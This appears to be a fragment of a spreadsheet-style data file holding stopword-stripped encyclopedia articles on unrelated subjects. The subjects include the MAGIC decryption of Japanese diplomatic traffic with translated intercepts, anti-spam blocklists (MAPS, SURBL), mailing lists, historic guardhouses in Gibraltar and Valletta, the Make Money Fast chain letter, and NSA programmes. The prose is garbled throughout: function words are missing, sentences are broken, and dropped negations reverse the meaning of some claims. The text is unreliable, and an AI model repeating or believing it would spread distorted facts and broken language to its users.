u.s. navy army insistent alone handle decrypted traffic delivery, especially highly placed policy makers u.s. eventually, much to-ing fro-ing, compromise reached: army would responsible decrypts day, navy next. distribution list eventually included military intelligence leaders washington elsewhere, but, again, civilian policy leaders washington. eventual routine distribution included following steps: duty officer (army navy, depending day) would decide decrypts significant interesting enough distribute would collected, locked briefcase, turned relatively junior officer (not always cleared read decrypts) would 'make rounds' appropriate offices. copies decrypts left anyone list. recipient would allowed read translated decrypt, presence distributing officer, required return immediately upon finishing. before beginning second week december 1941, last time anyone list particular decrypt. decryption process there several prior steps needed decrypt ready distribution: interception. japanese foreign office used wireless transmission cables communicate shore units. wireless transmission intercepted possible) several listening stations (hawaii, guam, bainbridge island washington state, dutch harbor alaska island, etc.) cypher groups forwarded washington, d.c. eventually, decryption stations (including copy army's purple machine) philippines well. cable traffic (for many years late 1941) collected cable company offices military officer made copies started washington. cable traffic hawaii intercepted legal concerns david sarnoff agreed allow visit hawaii first week december 1941. point, intercepts mailed (army navy) intelligence field. deciphering. intercept deciphered either army navy (depending day). deciphering usually successful cipher broken. translation. having obtained plain text, latin letters, translated. because navy japanese-speaking officers, much burden translation fell onto navy. japanese difficult language, meaning highly dependent upon context, effective translation required fluent japanese, considerable knowledge context within message sent. evaluation. translated decrypt evaluated intelligence content. example, ostensible content message meaningful? instance, part power contest within foreign office part japanese government, meaning implications would quite different simple informational instructional message embassy. might another message series whose meaning, taken together, meaning individual message. thus, fourteenth message embassy instructing embassy instruct japanese merchant ships calling country return home waters before, say, november would significant single message meant single ship port. only evaluated translated decrypt intelligence value could anyone decide whether deserved distributed.in period attack pearl harbor, material handled awkwardly inefficiently, distributed even awkwardly. nevertheless, extraordinary experience reading foreign government's closely held communications, sometimes even intended recipient, astonishing. astonishing, someone (possibly president roosevelt) called magic. name stuck. executive order 9066 aspect magic remains controversial amount involvement intercepts played issuing united states executive order 9066 february 1942, subsequent executive order 9102 march creation wartime relocation authority (wra). this often confused issue internment, actually handled justice department's immigration naturalization service (ins) affected citizens countries united states location. internment "enemy aliens" u.s. government began months prior executive order 9066 december 1941, immediately attack pearl harbor included germans italians, japanese living u.s. west coast.david lowman book magic: untold story reports primary justification japanese-american relocations internments protect espionage sabotage, magic could mentioned war. those defending decision evacuate relocate seen context, notably blogger investigative reporter michelle malkin, point magic intercepts partial justification 9066. malkin cites 1984 testimony undersecretary magic knowledge, stated magic "was important factor" considerations. extensive additional primary source documents cited malkin's book defense internment argue magic intercepts discuss development ring among japanese americans japanese consulates, provide type espionage data sent japan, much raised suspicion many thousands japanese american community espionage risk, including members kibei, issei nisei. 1988, congress passed president ronald reagan signed legislation apologized internment behalf u.s. government. legislation said government actions based "race prejudice, hysteria, failure political leadership". hearings produced decision take account magic intercepts.the following actual text several magic intercepts translated english declassified made public 1978 u.s. government (the magic background pearl harbor:, government printing office, volumes) tokyo washington magic intercept tokyo washington 1941intercept dated january 1941 noted translated 2-7-41 numbered from: tokyo (matsuoka) washington (koshi) parts—complete). (foreign office secret). establish intelligence organ embassy maintain liaison private semi-official intelligence organs (see message washington #591 #732 york tokyo, last year's series). with regard this, holding discussions various circles involved present time. focal point investigations shall determination total strength u.s. investigations shall divided three general classifications: political, economic, military, definite course action shall mapped out. make survey persons organizations either openly secretly oppose participation war. make investigations antisemitism, communism, movements negroes, labor movements. utilization u.s. citizens foreign extraction (other japanese), aliens (other japanese), communists, negroes, labor union members, anti-semites, carrying investigations described preceding paragraph would undoubtedly bear best results. these men, moreover, access governmental establishments, (laboratories?), governmental organizations various characters, factories, transportation facilities. utilization "second generations" resident nationals. view fact slip phase, people u.s. subjected considerable persecution, utmost caution must exercised). event u.s. participation war, intelligence set-up moved mexico, making country nerve center intelligence net. therefore, bear mind anticipation eventuality, facilities u.s.-mexico international intelligence route. this cover brazil, argentina, chile, peru also centered mexico. shall cooperate german italian intelligence organs u.s. this phase discussed germans italians tokyo, approved. please details secretary terasaki upon assuming duties there. please send copies offices distribution list japanese u.s. consulates tokyo throughout rest 1941, messages tokyo embassies consulates continued intercepted. response ordered shift propaganda efforts espionage collection, japanese consulates throughout western hemisphere reported information normally diplomatic channels, time-sensitive purple encoded messages. this provided vital clues progress directly u.s. president advisers. intercepts 1941 consulates angeles seattle report japanese success obtaining information cooperation "second generation" japanese americans others. magic intercept tokyo #067 1941intercept dated 1941 translated 5-19-41 numbered #067 from: angeles (nakauchi) tokyo (gaimudaijin) parts—complete). strictly secret. message washington. everything power establish outside contacts connection efforts gather intelligence material. regard, decided make white persons negroes, japanese persons cannot trust completely. would difficult hire u.s. (military?) experts work present time, expenses would exceedingly high.) shall, furthermore, maintain close connections japanese association, chamber commerce, newspapers. with regard airplane manufacturing plants military establishments parts, plan establish close relations various organizations strict secrecy keep military establishments close surveillance. through means, hope able obtain accurate detailed intelligence reports. already established contacts absolutely reliable japanese pedro diego area, keep close watch shipments airplanes materials, report amounts destinations shipments. steps taken regards traffic across u.s.-mexico border. shall maintain connection second generations present (u.s.) army, keep informed various developments army. also connections second generations working airplane plants intelligence purposes. with regard navy, cooperating naval attache's office, submitting reports accurately speedily possible. nakazawa investigate summarize information gathered first hand newspaper reports, regard military movements, labor disputes, communistic activities similar matters. with regard anti-jewish movements, investigations made prominent americans japanese connected movie industry centered area. already established connections influential negroes keep informed regard negro movement. magic intercept seattle tokyo 1941intercept dated 1941 translated 6-9-41 numbered from: seattle (sato) tokyo parts—complete) washington political contacts collecting intelligences revolving around political questions, also questions american participation whole country local area. economic contacts using foreign company employees, well employees companies here, collection intelligence economics along lines construction ships, number airplanes produced various types, production copper, zinc aluminum, yield cans, lumber. exerting best efforts toward acquisition intelligences competent americans. from american, contacted recently, received private report machinists german origin communists members labor organizations bremerton naval yard boeing airplane factory. second generation japanese ----- ----- ----- [three words missing]. military contacts securing intelligences concerning concentration warships within bremerton naval yard, information regard mercantile shipping airplane manufacturing, movements military forces, well concerns troop maneuvers. with basis, sent field contact comdr. okada, intelligences wired accordance past practice. kaneko charge this. recently occasions made investigations spot various military establishments concentration points various areas. future made arrangements collect intelligences second generation japanese draftees matters dealing troops, well troop speech behavior. ----- ---- -----. [three words missing] contacts labor unions local labor unions a.f. c.i.o. considerable influence. (socialist?) party maintains office (its political sphere influence extends twelve zones.) c.i.o., especially, active here. first generation japanese, member labor movement committee chairman, contact organizer, received report, though resume, american members (socialist party. ------ okamaru charge this. order contact americans foreign extraction foreigners, addition third parties, collection intelligences regard anti-participation organizations anti-jewish movement, making second generation japanese lawyer. this intelligence ---- ----- -----. access roosevelt's cabinet these intercepts plus reports office naval intelligence counter-espionage efforts, tachibana espionage case summer 1941, efforts japanese yakuza throughout 1930s along west coast (the tokoyo toyo clubs) available senior leaders roosevelt cabinet. even edgar hoover, director fbi, privy existence magic intelligence. opposing viewpoint those consider executive order 9066 regarding japanese american internment based magic intercepts, argue: commanding officer west coast, gen. dewitt, magic intercept list, superior, secretary henry stimson, intercept list, stimson requested justification relocation program dewitt. magic intercepts provided justification, dewitt justification?one theory stimson wanted dewitt provide justifications could made public, magic intercepts could made public. issue inflamed release malkin's 2004 book, defense internment, magic intercepts play major role defense thesis. other japanese ciphers purple enticing, quite tactically limited, window japanese planning policy peculiar nature japanese policy making prior (see above). early better tactical window japanese fleet code encoded cypher), called jn-25 u.s. navy cryptanalysts. breaking version months december 1941 provided enough information lead u.s. naval victories battles coral midway, stopping initial japanese advances south eliminating bulk japanese naval power. later, broken jn-25 traffic provided schedule routing plane admiral isoroku yamamoto would flying inspection tour southwest pacific, giving usaaf pilots chance ambush officer conceived pearl harbor attack. later still, access japanese army messages decrypts army communications traffic assisted planning island hopping campaign philippines beyond. another source information japanese military attaché code (known allies) introduced 1941. this fractionating transposition system based two-letter code groups stood common words phrases. groups written square grid according irregular pattern read vertically, similar disrupted columnar transposition. then letters superenciphered using pre-arranged table alphabets. this system broken john tiltman bletchley park 1942. other claimed breaks purple 1992 book sword shield: mitrokhin archive secret history kgb, christopher andrew, based mitrokhin archive smuggled russia early 1990s archivist, contains information wartime soviet knowledge japanese enciphered transmissions. claims soviets independently broke japanese purple traffic well predecessor machine). claims decrypted purple messages contributed decision stalin move troops eastern asia area around moscow counterattack germany december 1941, messages convinced soviet government would japanese attack. secret magic? public notice actually served japanese cryptography dangerously inadequate chicago tribune, published series stories midway, starting june 1942, claimed (correctly) victory large part u.s. breaking japanese crypto systems case, jn-25 cypher, though system(s) broken mentioned newspaper stories). tribune claimed story written stanley johnston knowledge (and jane's).ronald lewin points story repeats layout errors signal admiral nimitz johnston transport barnett. nimitz reprimanded admiral king sending dispatch task force commanders channel available nearly ships. lexington's executive officer, commander morton seligman assigned shore duty retired early. however, neither japanese anyone might told seem noticed either tribune coverage, stories based tribune account published u.s. papers. notice announcements made floor united states congress effect. there changes japanese cryptography connected newspaper accounts congressional disclosures. alvin kernan aviation ordnanceman board aircraft carriers enterprise hornet war. during time, awarded navy cross. book crossing line, states carrier returned pearl harbor resupply battle midway, crew knew japanese code broken u.s. naval forces preparing engage japanese fleet midway. insists "…exactly remembers occasion told, full details ships dates…" despite later insistence breaking code kept secret.u.s. navy commander i.j. galantin, retired admiral, refers several times magic 1988 book pacific theater patrols captain u.s. submarine halibut. however, galantin refers magic "ultra" actually name given breaking german code. upon receiving message pacific fleet command, directing normal station intercept japanese vessels magic message, galantin writes. written night orders carefully. made reference ultra stressed need alert targets fruitful area". galantin previously mentioned book submarine captains aware "ultra" (magic).in addition, army chief staff george marshall discovered early magic documents widely read white house, "…at time people reading messages intercepted japanese… everyone seemed reading them" fiction neal stephenson's novel cryptonomicon includes fictionalized version magic, japanese cryptosystem named "indigo" rather "purple". james bond given products fictionalized "magic decryption programme only live twice bargaining chip deployed negotiate intelligence concessions tiger tanaka, head japanese intelligence. w.e.b. griffin series corps fictionalized account united states navy marine corps intelligence operations pacific theater world many main characters novels, fictional historical, access intelligence magic. also japanese army diplomatic codes japanese naval codes ultra (cryptography) footnotes sources further reading</t>
  </si>
  <si>
    <t>Mail Abuse Prevention System</t>
  </si>
  <si>
    <t>mail abuse prevention system (maps) organization provides anti-spam support maintaining dnsbl. they provide five black lists, categorising address block listed: real-time blackhole list (rbl), maps probably best known. dialup users list (dul), blocks addresses include many soho users. relay spam stopper (rss), spam relays, e.g. hijacked servers. open proxy servers (ops), naively open smtp servers. non-confirming mailing list (nml), marketers opt-out strategy.the acronym maps spam spelled backwards. history maps founded 1996 non-profit organization pioneer innovative anti-spam techniques (e-mail). early history maps history dnsbls itself. dave rand paul vixie, well known internet software engineers, started keeping list addresses sent spam engaged behavior found objectionable. list became known real-time blackhole list (rbl). many network managers wanted block unwanted e-mail. thus, rand vixie created dns-based distribution scheme quickly became popular.being certain absolute right publish anti-spam blacklist, maps published "how page, inviting spammers help create case law. 2000 maps named defendant fewer three lawsuits, sued yesmail, media3, survey giant harris interactive. first lawsuits came maps brought anne mitchell director legal public affairs. 2001 company started require subscription accessing lists. non-subscribed users received dummy unlisted response. maps explained expectation enough funds free support failed, forced make decision. however, spirit company remained non-profit organization. their subscription page quite hidden .org site, fax-based subscription mechanism rather awkward. 2004 maps became division kelkea, inc, moved redwood city jose, .org .com. dave rand founder kelkea time. june 2005, trend micro, inc. acquired kelkea, brought substantial improvement subscription mechanism, including fully automated method getting temporary subscriptions. addition, subscribers provided personalised pages view reports, also whitelisting blacklisting options (whitelisting particularly convenient, allows whitelist thousands addresses clicks). criticism proposing many lists confuse maps subscriber; postmasters hurriedly subscribe lists. difference open proxy relays spam 'somehow open', spam relay clear, postmasters conclude lists use, spam block. however, maps lists, dul, significantly different others. supposed list addresses dynamically assigned end-users (but practice also includes statically-allocated ones), directly related spam, evidence maps archives address used relay spam. dul's purpose educate users relay mail acknowledged isp, rather running mail servers. doing would bring various advantages disadvantages; acknowledged isps can, general, afford monitor systems thoroughly order avoid viruses, hijackers similar threats. furthermore, paves effectively exploiting policies like spf, rely upon end-user smtp authentication order block email address abuse. also prevents users domain publish proper policy. addition, email relays incompatible fine-grained address blocking: relay spam blocked, affects users. maps fails disambiguate concepts acknowledged versus end-users addresses formal definition. while relatively straightforward recognize isps network providers, mailbox providers easily confused end-users different kinds. when coupled ability easily whitelist local internet registry/region correct obvious shortcomings, using block mail result obscure policy jeopardizes global reliability email delivery. generates amount false positives much higher maps claims aware blocking many legitimate websites users, catching estimated spam. this study, however, done 2002, involved rbl, dul. looking current results, last years shows responsible blocking majority spam messages. mostly stops compromised end-user machines (and routers) abused send spam. following table shows results, percentage spam blocked. also email spam anti-spam techniques comparison blacklists references external links main maps page</t>
  </si>
  <si>
    <t>MailChannels</t>
  </si>
  <si>
    <t>mailchannels cybersecurity technology company based vancouver, british columbia. provides email security, email delivery services hosting providers. mailchannels mailchannels specializes software services detect block sending spam, phishing abusive email. unlike anti-spam technology providers, mailchannels positions leader blocking abusive email source installing software services within sending networks services isps hosting providers. combat outgoing spam, mailchannels offers customers either cloud-based smtp relay service software installed customer within network. mailchannels' software derives open-source proxy software nginx, such, company makes claim software extremely scalable robust.mailchannels' customers include large hosting companies, internet service providers, mailbox providers email service providers endurance international group, sendgrid, sherweb, locaweb. company history company founded 2004 former engineers activestate (acquired sophos), created first commercial spam filters. company's first product smtp proxy provides tar-pitting transparent smtp proxy functionality inbound email filtering. 2007 spam conference, company's founder, simpson, awarded best paper award. 2007, mailchannels joined m³aawg closed series round early microsoft employees. 2010, company launched outbound email filtering software claims capable filtering million messages hour, transparently network. outbound email filtering involves scanning email traffic exits network, identifying compromised accounts, reducing risk addresses blocked receiving networks. 2013, company launched cloud-based outbound email filtering service. 2018, company launched cloud-based inbound email filtering service. also e-mail spam mail transport agent outbound spam protection tarpit (networking) references external links mailchannels host industry review: mailchannels provides outbound spam filter host vps.net washington post: technology aims bore impatient spammers network world: tarpits deter impatient spammers register: spam: sucks like tarpit o'reilly radar: spamonomics onlamp: developing high-performance asynchronous applications case study using mail channels within hosting industry</t>
  </si>
  <si>
    <t>Mailbox provider</t>
  </si>
  <si>
    <t>mailbox provider, mail service provider somewhat improperly, email service provider provider email hosting. implements email servers send, receive, accept, store email organizations users, behalf. term "mail service provider" coined internet mail architecture document 5598. types there various kinds email providers. there paid free ones, possibly sustained advertising. some allow anonymous users, whereby single user multiple, apparently unrelated accounts. some require full identification credentials; example, company provide email accounts full-time staff only. often, companies, universities, organizations, groups, individuals manage mail servers adopt naming conventions make straightforward identify owner given email address. besides control local names, insourcing provide data confidentiality, network traffic optimization, fun. mailbox providers typically accomplish task implementing simple mail transfer protocol (smtp) possibly providing access messages internet message access protocol (imap), post office protocol, webmail, proprietary protocol. parts task still outsourced, example virus spam filtering incoming mail, authentication outgoing mail. isp-based email many mailbox providers also access providers. core product, email services could lack interesting features, imap, transport layer security, smtp authentication fact, without latter, recognize clients addresses assigns them. free mail providers mail, hotmail, lycos, mail.com, yahoo! mail, launched 1990s, among early providers free email accounts, joined gmail 2004. they attract users free advertise service every message. according jurvetson, hotmail grew zero million users months. that bought microsoft. premium email services these paid equivalent free mail providers. that better alternative isp-based email. much less popular free mail, target niche users. vanity email also possible shim service, providing access forwarding messages another account, lend direct use, example temporary less appealing. role identifier mailbox provider administrator registered domain name forms domain-part email addresses. such, controls records specify hosts receive email destined addresses. operators hosts define meaning local-part address associating mailbox, turn associated user. mailbox provider also specifies users read mail, possibly creating records ease email client configuration, giving detailed instructions. email addresses convenient tokens identifying people, even sites unrelated email. fact, unique, allow password reminders sent will. from bureaucracy-oriented point view, formal undertaking beyond domain name registration. this role based ietf standards, and, unlike x.400 itu-t works, requires arrangements local authorities. notion administration management domain (admd) derived afterwards, empirical evidence. however, local authorities concerned internet privacy issues rules requisites original internet email design. also email mailbox internet service provider email hosting service premium email mail server references</t>
  </si>
  <si>
    <t>Mailing list</t>
  </si>
  <si>
    <t>mailing list collection names addresses used individual organization send material multiple recipients. term often extended include people subscribed list, group subscribers referred "the mailing list", simply "the list." transmission paper-based electronic. each strength, although 2022 article claimed "direct mail still brings lion’s share revenue organizations." types least types mailing lists defined: announcement list closer original sense, "mailing list" people used recipient newsletters, periodicals advertising. traditionally done postal system, rise email, electronic mailing list became popular. this type list used primarily one-way conduit information "posted selected people. this also referred term newsletter. newsletter promotional emailing lists employed various sectors parts direct marketing campaigns. 'discussion list' allows subscribing members (sometimes even people outside list) post items broadcast mailing list members. recipients answer similar fashion, thus, actual discussion information exchanges occur. mailing lists type usually topic-oriented (for example, politics, scientific discussion, health problems, joke contests), topic range extremely narrow "whatever think could interest us". similar usenet newsgroups, another form discussion group aversion off-topic messages.historically mailing lists preceded email/web forums; provide analogous functionalities. when used fashion, mailing lists sometimes known discussion lists discussion forums. discussion lists provide advantages typical forums, still used various projects, notably debian. advantages forums include ability work offline, ability sign/encrypt posts gpg, ability e-mail client's features, filters. tracking mailers want know items delivered, partly know staff call centers. salting seeding) lists enables compare delivery times, especially time-of-year affects arrival delays. also provide information poor handling samples.having seeded entries email list simplifies tracking "borrowed" list without permission. more definitions when similar identical material sent subscribers mailing list, often referred mailshot blast. list also referred distribution list. legitimate (non-spam) mailing lists, individuals subscribe unsubscribe themselves. mailing lists often rented sold. rented, renter agrees mailing list contractually agreed-upon times. mailing list owner typically enforces "salting" (known "seeding" direct mail) mailing list fake addresses creating salts time list rented. unscrupulous renters attempt bypass salts renting several lists merging find common, valid addresses.mailing list brokers exist help organizations rent lists. list owners, specialized niche publications charitable groups, lists valuable assets, mailing list brokers help maximize value lists. mailing list simply list e-mail addresses people interested subject, members work group, taking class together. when member list sends note group's special address, e-mail broadcast members list. advantage mailing list things web-based discussion message becomes available immediately delivered participants' mailboxes. mailing list sometime also include information phone number, postal address, number more. electronic mailing list electronic mailing list email list special email allows widespread distribution information many internet users. similar traditional mailing list list names addresses might kept organization sending publications members customers, typically refers four things: list email addresses, people ("subscribers") receiving mail addresses, thus defining community gathered around topic interest. publications (email messages) sent addresses, reflector, single email address that, designated recipient message, send copy message subscribers. mechanism electronic mailing lists usually fully partially automated special mailing list software reflector address server capable receiving email. incoming messages sent reflector address processed software, and, depending content, acted upon internally case messages containing commands directed software itself) distributed email addresses subscribed mailing list. web-based interface often available allow people subscribe, unsubscribe, change preferences. however, mailing list servers existed long world wide web, also accept commands email special email address. this allows subscribers want subscribers) perform tasks subscribing unsubscribing, temporarily halting sending messages them, changing available preferences email. common format sending commands send email contains simply command followed name electronic mailing list command pertains examples: subscribe anylist subscribe anylist john doe. electronic mailing list servers forward messages subscribers particular mailing list either individually received list server, digest form messages received particular list server combined email sent subscribers. some mailing lists allow individual subscribers decide prefer receive messages list server (individual digest). history mailing lists first scholarly mailing lists. genealogy mailing lists communication tool scientists traced back times fledgling arpanet. computer scientists involved project develop protocols communication computers. doing, also built first tools human computer-mediated communication. broadly speaking, scholarly mailing lists even seen modern version salons enlightenment ages, designed scholars scholars.the "threaded conversation" structure (where header first post defines topic series answers thus constituting thread) typical ubiquitous structure discourse within lists fora internet. pivotal structure topicality debates within mailing lists arena, public sphere habermas wording. flame wars liveliest episodes) give valuable unique information historians comprehend stake communities gathered around lists.anthropologists, sociologists historians used mailing lists fieldwork. topics include series fandom, online culture, scientific practices among many academic studies. from historian's point view, issue preservation mailing lists heritage (and internet fora heritage general) essential. text corpus messages perennially archived, also related metadata, timestamps, headers define topics, etc. mailing lists archives unique opportunity historians explore interactions, debates, even tensions reveal communities. list security discussion lists newsletter lists precautions taken avoid spamming. discussion lists often require every message approved moderator sent rest subscribers (moderated lists), although higher-traffic lists typically moderate messages subscribers. companies sending promotional newsletters option working whitelist mail distributors, agree standards high fines isps opt-in subscribers complain. exchange compliance agreement prohibitive fines, emails sent whitelisted companies blocked spam filters, often reroute legitimate, non-spam emails. subscription some mailing lists open anyone wants join them, others require approval list owner join. joining mailing list called "subscribing" leaving list called "unsubscribing". archives mailing list archive collection past messages electronic mailing lists. such archives often include searching indexing functionality. many archives directly associated mailing list, organizations, gmane, collect archives multiple mailing lists hosted different organizations; thus, message sent popular mailing list many different archives. gmane 9,000 mailing list archives january 2007. some popular free software programs collecting mailing list archives hypermail, mhonarc, fudforum. listwashing listwashing process individual entries mailing lists removed. these mailing lists typically contain email addresses phone numbers voluntarily subscribed. entry removed list complaint received. only complainers removed process. widely believed small fraction inconvenienced unsolicited email sending proper complaint. because voluntarily subscribed stay list, complainers stop complaining removed, helps spammers maintain "complaint-free" list spammable email addresses. internet service providers forward complaints spamming party often seen assisting spammer list washing, short, helping spammers. most legitimate list holders provide customers listwashing data deduplication service regularly free small fee. also references</t>
  </si>
  <si>
    <t>Main Guard (Gibraltar)</t>
  </si>
  <si>
    <t>main guard historic, 18th-century guardhouse british overseas territory gibraltar. while exact date construction unknown, oldest building john mackintosh square. french artist henri regnault produced three paintings visitor main guard. after displayed guardhouse many years, kept gibraltar museum. building's function changed centuries. main guard first served guardhouse; 20th century, functioned fire station, bath house, government offices. since 2001, building housed gibraltar heritage trust underwent restoration 2011. first years main guard historic building gibraltar, british overseas territory southern iberian peninsula. located south known john mackintosh square, near gibraltar city hall, formerly referred connaught house. while exact date construction unknown, main guard building oldest square. first references building found documents date mid-18th century. 1748, gibraltar visitor stayed parade, former name john mackintosh square, wrote "grand guard house" near hotel "one neatest buildings" area. described "but storey high" which, based observation, usual height buildings gibraltar. related front guardhouse, parade, "whipping post, almost every soldiers brought feel scourge." floggings meted parade form military punishment.in mid-18th century, john mackintosh square used parade ground known parade. building shown plan drawn 1750, published 1770, referred main guard room. 1753 plan parade, labelled main guard. location near king's bastion meant sustained extensive damage great siege gibraltar (1779–1783). second storey present today likely added guardhouse rebuilt. 1830s image commercial square, another previous name john mackintosh square, building shown storeys. 1830s painting (pictured above) british artist thomas colman dibdin (1810 1893) shows main guard officers stationed outside, well nearby exchange commercial library eastern side square. every evening, sentries gibraltar would receive assignments main guard. early 19th-century regulations gibraltar required inhabitant wandering streets midnight without permit transferred main guard. addition, inebriated soldier city sent guardhouse. more recent history french painter henri regnault october 1843 january 1871), native paris, frequent visitor main guard late 1860s, friend officers. artist (pictured left) produced three paintings officers which, displayed guardhouse many years, removed restoration current location unknown. other museums hold works include musée d'orsay, cleveland museum art, metropolitan museum art. regnault died battle buzenval 1871 defending country franco-prussian war. later century, 1885, gibraltar directory indicated guardhouse commercial square guardroom cells ground floor officers' room second floor. time 1896 directory, building still utilised guardhouse.by 1911, however, building longer guardhouse. interval world world building served city fire station. later 20th century, main guard used government offices licensing payment bills. since 2001, main guard headquarters gibraltar heritage trust. early 2011, friends gibraltar, also known friends gibraltar heritage society, pledged contribute £10,000 assist restoration main guard. restoration begin.. references external links photograph main guard john mackintosh square</t>
  </si>
  <si>
    <t>Main Guard (Valletta)</t>
  </si>
  <si>
    <t>main guard, originally called guardia della piazza, building valletta, malta, located square facing grandmaster's palace city centre. originally built guardhouse 1603 order john, remained british took malta 1800. neoclassical portico added 1814, british coat arms commemorative inscription installed later portico. these become main symbols british rule malta. building used house office attorney general. history main guard building built 1603 house regimento guardia, personal guards grand master order john. built square facing grandmaster's palace. building's original form without portico visible painting dating back french occupation malta. 1814, neoclassical portico added main guard british, governorship thomas maitland. early paintings first years british rule malta show building portico, well three trophies roof. some time later, trophies removed, relief british coat arms added portico, following latin inscription magnæ invictæ britanniae melitensium amor europae insulas confirmat a.d. 1814 (meaning love maltese voice europe assigned islands great unconquered britain. a.d. 1814) portico designed greek revival style, hence neoclassic, among first design country. design portico attributed either maltese architect giorgio pullicino, colonel george whitmore royal engineers. sculpted coat arms probably work vincenzo dimech. portico, coat arms inscription considered iconic symbols british rule malta.the british continued building house guards governor malta, resided grandmaster's palace. life main guard quite boring, many soldiers painted carved regimental badges things walls building. 1851, original coat arms inscription deteriorated extent removed replaced. coat arms replica original arms king george iii, then-reigning monarch queen victoria.in 1974, building converted libyan cultural centre, british coat arms inscription covered zinc plywood bearing arabic inscription. libyan cultural centre moved elsewhere change government 1987, coat arms uncovered. main guard subsequently became annex office attorney general eventually transferred heritage malta restoration. 2009, inscription coat arms restored part regeneration george's square, resulted number spelling errors within inscription. 2015, plans transfer valletta local council main guard, never implemented. building heritage malta's wing currently undergoing restoration. once complete, serve interpretation center heritage malta sites capital city. layout building's façade single floor, rear part building, located strait street, three floors. this difference levels streets. further reading malta main guard murals morana, martin (2011). bejn kliem storja maltese). malta: books distributors limited. isbn 978-99957-0137-6. archived original october 2016. bonello, giovanni june 2010). latin inscription main guard. times malta. valletta vibrant city many styles maltese nobility maltese history references</t>
  </si>
  <si>
    <t>SURBL</t>
  </si>
  <si>
    <t>surbl (previously stood spam rbl) collection dnsbl lists uniform resource identifier (uri) hosts, typically site domains, appear unsolicited messages. surbl used search incoming e-mail message bodies spam payload links help evaluate whether messages unsolicited. example, http://www.example.com listed, e-mail messages message body containing classified unsolicited. dnsbls differ prior dnsbls, commonly list mail sending addresses. surbl specific instance general dnsbl list type. lists surbl provides lists different types: abuse spam abuse sites phishing sites malware sites cracked sitesall lists gathered multi.surbl.org. usage query domain address taken sent form spamdomain.example.multi.surbl.org 4.3.2.1.multi.surbl.org. multi zone return records contain codes indicate list contains queried domain address. many spam filters support surbl. small sites surbl public queries, rsync data feed available professional users. surbl data also available response policy zone formats. history surbl created 2004 replace formatted text-based lists sa-blacklist previously used spamassassin distributed sites. announcement surbl dnsbl made april 2004 spamassassin user community. surbl first major list dnsbl type, later followed uribl.com, ivmuri spamhaus dbl. also dnsbl, spam prevention method e-mail messages accepted rejected depending address mail server message received. references external links official website</t>
  </si>
  <si>
    <t>Safelayer Secure Communications</t>
  </si>
  <si>
    <t>safelayer secure communications s.a. spanish private company founded 1999. develops software products public infrastructure area (digital security identity management, electronic signature data protection). safelayer's technology part three major certification digital identity projects spain: fábrica nacional moneda timbre, spanish card electrónico spanish e-passport. safelayer's technology also secures nato x400 messaging system. safelayer's technology eal2 eal4+ common criteria certified. currently, safelayer company whole family products eal4+ certified. products keyone certificate authority. keyone validation authority (ocsp responder) based standard protocol ocsp ietf. keyone tsa: time-stamping authority (trusted timestamping) based standard protocol ietf. keyone xra: registration authority. trustedx eidas platform. trustedx authentication platform. trustedx electronic signature. trustedx encryption management. references external links safelayer's website</t>
  </si>
  <si>
    <t>Make Money Fast</t>
  </si>
  <si>
    <t>make money fast (stylised make.money.fast) title electronically forwarded chain letter created 1988 became infamous term often used describe sorts chain letters forwarded internet, e-mail spam, usenet newsgroups. anti-spammer slang, name often abbreviated "mmf". history original "make money fast" letter written around 1988 person used name dave rhodes. biographical details certain, clear even person's actual name. letter encouraged readers email forward dollar cash list people provided text, name address bottom list deleting name address top. using theory behind pyramid schemes, resulting chain money flowing back forth would supposedly deliver reward thousands dollars ones participating chain, copies chain spread people sent dollar address. according net.legends usenet news group, dave rhodes student columbia union college (now washington adventist university), seventh-day adventist college maryland, wrote letter uploaded text file nearby around 1987. earliest posting usenet posted david walton 1989, also using columbia union college account. walton referred "bizman dave modem slave", referred "dave rhodes" post. true identity dave rhodes found. supposed self-published site dave rhodes found fake.the scam forwarded e-mail usenet. 1994 "make money fast" became persistent spams multiple variations. chain letters follow rigidly predefined format template minor variations (such claiming retired lawyer claiming selling "reports" order attempt make scheme appear lawful). they quickly became repetitive, causing bait widespread satire parody. widespread parody begins subject "get.arrested.fast" line, "hi, dave rhodes, jail". another parody sent around academic circles "make tenure fast", substituting sending money individuals list listing journal citations. legality text letter originally claimed practice "perfectly legal", citing title sections 1302 1341 postal lottery laws. u.s. postal inspection service cites title united states code, section 1302 asserts illegality chain letters, including "make money fast" scheme: there's least problem chain letters. they're illegal request money items value promise substantial return participants. chain letters form gambling, sending mail delivering person computer, mailing money participate) violates title united states code, section 1302, postal lottery statute (chain letters items minor value, like picture postcards recipes, mailed, since items things value within meaning law). also asserts that, "regardless technology used advance scheme, mail used step along way, still illegal." u.s. postal inspection service asserts mathematical impossibility participants winners, well possibilities participants fail send money first person listed, perpetrator listed multiple times different addresses names, thus ensuring money goes person.in recent years, avenue spammers used circumvent postal laws, conduct business non-postal routes, sending email message instructing recipients send money electronic services paypal. while specific laws mentioned violated regular postal mail used point process communication, sending chain letters often prohibited terms service and/or user agreements many email providers, result account suspended revoked. also list internet phenomena list spammers pyramid scheme spam (electronic) there ain't thing free lunch references</t>
  </si>
  <si>
    <t>STU-I</t>
  </si>
  <si>
    <t>stu-i, like successors sometimes known "stew phone", secure telephone developed u.s. national security agency senior u.s. government officials 1970s. also ky-3 navajo stu-ii stu-iii scip external links delusion.org national cryptologic museum pictures</t>
  </si>
  <si>
    <t>STORMBREW</t>
  </si>
  <si>
    <t>stormbrew secret internet surveillance program national security agency (nsa) united states. disclosed summer 2013 part leaks former contractor edward snowden. 2013 budget stormbrew $46.06 million. scope program program comprises cooperation "key corporate partner", identified october 2013 washington post—quoting historian matthew aid—as verizon. this confirmed joint report publica york times august 2015.stormbrew umbrella program involving surveillance telecommunications. falls category "upstream collection", meaning data pulled directly fiber-optic cables top-level communications infrastructure, allows access high volumes data. first pre-selection done telecommunication providers themselves, select internet traffic likely contains foreign communications. then data passed nsa, second selection made briefly copying traffic filtering using so-called "strong selectors" like phone numbers, e-mail addresses people organizations interested.a shows collection done entirely within united states. this corporate partner servers washington, california, texas, florida, around york, virginia, pennsylvania. sigads stormbrew consists following sigads: note: sigads otherwise designated presumed operate legal authority section fisa amendments (faa) glossary cyber counts: explanation provided source material. directory onmr: explanation provided source material. dni: digital network intelligence. dnr: dial number recognition. marina: database internet metadata. transit authority: legal authority states communications transit united states collectible, provided endpoints foreign. media relating stormbrew references</t>
  </si>
  <si>
    <t>SSS (cipher)</t>
  </si>
  <si>
    <t>cryptography, stream cypher algorithm developed gregory rose, philip hawkes, michael paddon, miriam wiggers vries. includes message authentication code feature. submitted estream project ecrypt network. selected focus consideration phase 'archived'. references</t>
  </si>
  <si>
